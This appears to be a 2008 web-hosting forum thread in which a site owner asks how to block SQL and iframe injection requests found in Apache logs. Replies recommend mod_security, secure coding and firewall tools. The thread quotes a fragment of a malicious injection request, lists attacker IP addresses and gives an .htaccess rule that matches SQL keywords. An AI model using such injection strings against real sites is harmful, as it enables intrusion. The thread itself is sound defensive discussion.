Results 1 to 21 of 21
-
08-26-2008, 10:30 AM #1Junior Guru Wannabe
- Join Date
- Jun 2007
- Posts
- 72
How to prevent iframe injection attack?
I see a request in my log files :
GET /?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST
Followed by some codes ...
There are too many pages on the Net about injection attacks , but all of I could find is in the level of news , apparently these types of attacks are increasing in current days , but no any cure?
I think the injection attacks I found in logs is a kind of Asian iframe attacks which shows user the mandate of a video CODEC installation or such a thing ...
My question : is it possible to prevent and block some of request strings in Apache? For example when a request arrives containing the above string?
At the end , I want to insert those attacker IPs :
58.61.134.17
222.113.196.71
123.19.164.40
70.140.147.128
82.66.91.243
123.240.44.67
60.210.103.158
193.188.105.220
---------------------
-
08-26-2008, 11:01 AM #2Web Hosting Guru
- Join Date
- Dec 2002
- Location
- USA
- Posts
- 339
A nice solution is Mod Security if you are not using it already. It will block alot of those injection attacks with the proper filters.
-
08-26-2008, 12:08 PM #3Junior Guru Wannabe
- Join Date
- Jun 2007
- Posts
- 72
Thanks FrontPage1 , is it possible to learn it during some few days?
Do you know some useful resources?
-
08-26-2008, 01:21 PM #4Eternal Learner
- Join Date
- Jul 2007
- Posts
- 2,051
Though all the security measures can block iframe sql injections, they are not fool proof solutions. The best way to prevent SQL injections is to make sure the coding is done keeping the security perspectives in mind. I have noticed many programmers writing bad piece of code and the applications getting attacked by the SQL Injections. In such a case, the programmers have to be forced to correct the code.
-
08-27-2008, 04:35 AM #5Web Hosting Guru
- Join Date
- Mar 2004
- Posts
- 291
I agree with prashant1979. The gateway is the badly written code and that needs to be taken care of first.
-
08-27-2008, 10:13 AM #6Web Hosting Master
- Join Date
- Dec 2001
- Posts
- 5,221
Greetings:
See http://groups.google.com/group/stopb...818a35ff3d37a4 and http://groups.google.com/group/stopb...660efeada77216 in terms of our experiences with this issue.
Thank you.
-
08-27-2008, 11:27 AM #7Web Hosting Guru
- Join Date
- Dec 2002
- Location
- USA
- Posts
- 339
-
08-27-2008, 12:59 PM #8
Do NOT rely on CPanel to do your administration work for you. Installing and configuring mod_security is not something that can be 'automated' by something like CPanel. You need to take god knows how many variables into affect, including what you're running on the server itself.
mod_security is NOT an all encompassing, or all in one solution. It's more of a pain in the tail end than a solution. A PROPER solution is to keep your server updated, patched, and worm free.Tom Whiting, WHMCS Guru extraordinaire
Linux problems? WHMCS Problems? Give me a shout
Check out my WHMCS Addons
-
08-27-2008, 01:29 PM #9Junior Guru Wannabe
- Join Date
- Jun 2007
- Posts
- 72
I found a book "Apache Security" , apparently written by the creator of mod_security , a little difficult for me to understand but I'm trying , hope to find an easier source.
Unfortunately this is a Plesk VPS , currently Apache gives code 200 to the above GET string and this is not a good symptom.
However seems no any of files are changed or infected , had a look to all of logs 3 times , I always upgrade and install newer version of softwares , but some things are wrong , the rsyslog was stopped and I observe abnormal changes in websites traffic , ...
-
08-27-2008, 03:49 PM #10Web Hosting Master
- Join Date
- Apr 2003
- Posts
- 2,407
Forget about blocking the ips, these attempts are distributed thru dummy machines.
I added the below to my htaccess and stopped them dead.
Code:RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC] RewriteRule .* - [F]
Technical Advisor for new A&E Series The Killing Season
There are no random acts of violence
Starts November 5th!
-
08-27-2008, 11:33 PM #11Junior Guru Wannabe
- Join Date
- Jun 2007
- Posts
- 72
Many thanks for the code AHFB.
Dummy machines? You mean forged IPs?
-
08-28-2008, 02:15 AM #12Aspiring Evangelist
- Join Date
- Oct 2005
- Posts
- 435
not forged.. but bots.. basically machines controlled by someone or a group.
Anyway .htaccess is definately the way to go to ignore the generic attacks but getting nicely coded applications and using the most updated versions is nice. Personally mod security is nice in the sense that you use it to tighten the security. Of course you shouldn't think of it as "I installed mod security, I'm good now" but rather use it as a way to tightening up the server. I do that because even the latest software might have some holes in it which can be used.
-
08-28-2008, 11:58 AM #13Web Hosting Guru
- Join Date
- Dec 2002
- Location
- USA
- Posts
- 339
Sure everyone should know how to administer their servers without fancy GUI interfaces. But that is not reality. If it was then Cpanel would not have hundreds of thousands of users.
If most noobie end users could keep their servers patched, updated, and worm free -- they really would not need cpanel. But they do. So, attacking CPanel is not really logical.
And yes, Mod Security fills the needs of the overwhelming majority of servers out there. No, it is not the end all be all, but it is a nice useful utility that is EASY to use.
-
08-28-2008, 12:10 PM #14Web Hosting Master
- Join Date
- Nov 2004
- Location
- Australia
- Posts
- 1,737
linux-tech makes a good point though. If you rely solely on mod_security to protect you, and you have insecure scripts on the server, one day it will bite you. As an example, if you have a hungry lion in a room with a closed door, you're safe. But if someone manages to open the door, they'll get eaten. Better to lock the door AND feed the lion well AND keep the lion in a cage. If someone opens the door by accident then, they'll be OK.
However, I've found mod_security fantastic, and wouldn't do without it. For instance, it's not fun to need to upgrade 30 Joomla 1.5 sites in a hurry because of the token password reset bug. (although in that case a simple locate/cksum could be used to identify existing insecure files and replace; that's not always an available solution though).
-
08-28-2008, 02:03 PM #15If it was then Cpanel would not have hundreds of thousands of users.
The primary goal and focus of CPanel is to be a Control Panel, something designed to help people do their job easier (ie: create email, add mysql databases, domains, ftp accounts). It is NOT a 'security' software.
Too many people recently have relied on CPanel to be their 'systems admin', when that's just not the job of CPanel. Oh sure, it's tried so hard to do it, but it CAN NOT, and WILL NOT ever take the place of a qualified systems admin.
Administration is so much more than looking at a pretty front end in your browser. That's ALL Cpanel is, a pretty front end. It does a lot of things for you, but it can not administrate your server for you. YOU must have the skill and the talent to do that yourself.Tom Whiting, WHMCS Guru extraordinaire
Linux problems? WHMCS Problems? Give me a shout
Check out my WHMCS Addons
-
08-28-2008, 05:18 PM #16WHT Addict
- Join Date
- Aug 2008
- Location
- Shoreline WA
- Posts
- 160
To focus on your question, not arguing about what cPanel is or is not, or the value of an experienced server administrator, I would have to say yes to your question. There is a way to filter those requests out, but setting up any kind of a filter is only a band-aid on a wound that needs to heal. I would suggest only using that as a temporary solution while you work out the actual problems in the old exploitable code. Then again you may already know this, and you just wanted a band-aid so you can work on fixing the root of the problem. I would suggest following some of the links mentioned by "dynamicnet", or if you do not do your own programming, find an experienced admin (programmer experienced in security matters) and have him work the code over.
-
08-28-2008, 07:25 PM #17Junior Guru Wannabe
- Join Date
- Jun 2007
- Posts
- 72
Fortunately I had not set any database on that server , all of databases are in other protected and managed DC , also I believe that banning IPs was effective , many of hackers are just children who study some attacking methods in books or learn some thing in university and want to examine it , so blocking the IPs can send a warning to them and also warning to network managers about the persons who rent their servers.
When their group try some times and see every thing is secure , they go to their way.
Beside this , I appreciate all of helps and kind messages.
-
08-28-2008, 07:41 PM #18Web Hosting Guru
- Join Date
- Dec 2002
- Location
- USA
- Posts
- 339
Never wrote Cpanel was the 'ultimate systems admin tool'. You invented that part.
I stated that Cpanel serves a function for server owners who are not proficient in running server admin functions without a GUI.
You might want to let the Cpanel staff know you can't 'update' system software using their product. They probably would be surprised by that 'fact'.
If this was a perfect world, every server owner could admin and write code on their own. But, the vast majority of server admins are noobs and need their hand held in running a server. Cpanel is that hand holding for many and many grow from that experience into learning command line functions. To trash Cpanel is just silly.
-
08-28-2008, 09:37 PM #19Web Hosting Master
- Join Date
- Nov 2004
- Location
- Australia
- Posts
- 1,737
I forgot the most important part of this; which was to say that why mod_security works well for me is that it works together with CSF to firewall off anyone who is testing dodgy URLs. This means that in general they only get a few chances to try SQL injection/URL inclusion/etc/etc before getting cut off; mostly this means they'll then move on and try a softer target (because it's an automated scanner). While mod_security by itself is OK, it only slows things down a little - the attackers just retry URLs until they find one that isn't matched and blocked in mod_security.
-
08-29-2008, 07:27 AM #20
This isn't a discussion about cPanel, please stick to the topic.
-
04-17-2010, 05:54 PM #21New Member
- Join Date
- Apr 2010
- Posts
- 1
Quick question